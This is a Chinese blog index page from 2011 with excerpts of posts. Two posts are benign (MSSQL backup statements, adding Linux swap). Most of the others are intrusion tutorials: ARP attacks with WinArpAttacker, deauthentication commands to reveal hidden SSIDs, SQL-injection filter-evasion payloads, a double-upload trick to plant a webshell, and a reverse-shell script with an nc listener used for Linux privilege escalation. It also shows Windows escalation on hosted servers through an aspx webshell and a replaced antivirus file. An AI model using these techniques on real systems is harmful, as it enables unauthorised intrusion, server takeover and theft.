2011年11月15日

ARP网络神兵WinArpAttacker

摘要: 现在网上很多关于ARP攻击的文章,但多数是描述其原理,少数会以某个工具作为例子展开说明,但感觉说的还是不够详细,今天写个文章以实战介绍一个叫“WinArpAttacker”的工具。 WinArpAttacker是一个很出名的ARP攻击工具,功能也很强大,没有用过的朋友可以在上网搜一下,下载这里就不提供了。这里先简单介绍一下这工具的基本用法(如果对于ARP攻击原理不熟悉的朋友可以先看看《Arp小记》:>): 1. 首先是下载软件,然后安装(废话…),注意一下:WinArpAttacker需要WinPcap作为支持,所以你的机器得先安装WinPcap,我现在装的是4.0.0,不知道还有没有更 阅读全文

posted @ 2011-11-15 08:35 0xcc 阅读(1537) 评论(0) 推荐(0) 编辑

2011年11月14日

MSSQL2005 数据库备份语句

摘要: --完整备份 Backup Database NorthwindCS To disk='G:\Backup\NorthwindCS_Full_20070908.bak'--差异备份 Backup Database NorthwindCS To disk='G:\Backup\NorthwindCS_Diff_20070908.bak' With Differential--日志备份,默认截断日志 Backup Log NorthwindCS To disk='G:\Backup\NorthwindCS_Log_20070908.bak'--日志备 阅读全文

posted @ 2011-11-14 14:36 0xcc 阅读(235) 评论(0) 推荐(0) 编辑

破解隐藏SSID

摘要: 前提:一定要有合法的客户端连上1.在BT3下先打开一个shell,输入airodump-ng 网卡端口2.打开另一个shell,输入aireplay-ng -0 10 -a AP的MAC -c 合法客户端的MAC 网卡端口,可能这个命令由于频道不对会出错,这时就要多重输几次(重输技巧:只要按一下向上键就可以了,如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止。3.然后就可以在上个shell,看到显示出来的SSID改天还得试试用科来抓包破解关闭了DHCP的WiFi,嘿嘿。 阅读全文

posted @ 2011-11-14 11:52 0xcc 阅读(1198) 评论(0) 推荐(0) 编辑

2011年11月13日

怎样绕过防注入系统

摘要: 1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or' swords' =‘swords',由于mssql的松散性,我们可以把or 'swords' 之间的空格去掉,并不影响运行。3、运用字符串判断代替 用经典的or 1=1判断绕过,如or 'swords' ='swords&# 阅读全文

posted @ 2011-11-13 19:33 0xcc 阅读(319) 评论(0) 推荐(0) 编辑

Linux增加swap分区

摘要: 在安装Oracle时要求很大的swap空间,发现swap空间不够,那应该怎么增加swap空间大小呢。在扩容钱,可以使用#grep SwapTotal /proc/meminfo命令查看swap空间大小,使用#du -h /tmp查看/tmp空间大小。以下的操作都要在root用户下进行,首先先建立一个分区,采用dd命令比如dd if=/dev/zero of=/home/swap bs=1024 count=512000 这样就会创建/home/swap这么一个分区文件。文件的大小是512000个block,一般情况下1个block为1K,所以这里空间是512M。接着再把这个分区变成swap分区 阅读全文

posted @ 2011-11-13 19:29 0xcc 阅读(223) 评论(0) 推荐(0) 编辑

突破限制——双文件上传

摘要: 2011-10-14 22:48 上传下载附件 (74.05 KB)下面是一个上传地址:右键—查看源代码,修改2处代码:修改后:保存为1.html第一个上传选择正常的jpg图片,第2个选择我们的马, 这里asp过滤了,所以我选择cdx成功突破, 右键—查看源代码最后菜刀连接上 ok 阅读全文

posted @ 2011-11-13 13:21 0xcc 阅读(300) 评论(0) 推荐(0) 编辑

linux溢出提权

摘要: 先在网站目录上传1.pl,是个反弹脚本 Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0然后执行 ./1.pl 本机IP 1224接着本机监听nc -vv -l -p 1224,图1 反弹成功输入id bash-3.2$ id uid=529(zeicom) gid=525(zeicom) groups=525(zeicom) bash-3.2$ 这里uid=529(zeicom)还不是root权限,输入uname –r 返回:2.6.18-164.11.1.el5PAE找对应的exp, 这里地址整理很齐全可以这里下 http://bbs.tian6.com/linux 阅读全文

posted @ 2011-11-13 02:40 0xcc 阅读(830) 评论(0) 推荐(0) 编辑

无wscript.shell组件提权

摘要: 代码:<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if 阅读全文

posted @ 2011-11-13 02:39 0xcc 阅读(382) 评论(0) 推荐(0) 编辑

星外提权

摘要: 星外提权方法打开我们的aspx马 http://www.xxxxoooo.com/template/default/html/z.aspx第一步 查找 c:\Program Files\360\360Safe\deepscan\Section\ 这个目录中的mutex.db 这个文件是360安全卫士的病毒库文件 我们要把这个文件替换成可执行的文件 打我们的 提权专用 文件夹 打开后,把cscript.exe命名为mutex.db 然后在把这文件上传到 c:\Program Files\360\360Safe\deepscan\Section\ 这个文件夹,上传后会替换mutex.db这个文件 阅读全文

posted @ 2011-11-13 02:25 0xcc 阅读(2131) 评论(0) 推荐(0) 编辑

2011年11月12日

无线攻击的基本知识(二)

摘要: 认证攻击 入侵者使用这些攻击,窃取合法用户的身份和证书,进而访问其它私密网络和服务。有效性攻击 这些攻击采用拒绝合法用户的访问无线局域网资源或者削弱那些资源的方法,从而阻止把无线服务传递给合法的用户。 阅读全文

posted @ 2011-11-12 01:26 0xcc 阅读(138) 评论(0) 推荐(0) 编辑

导航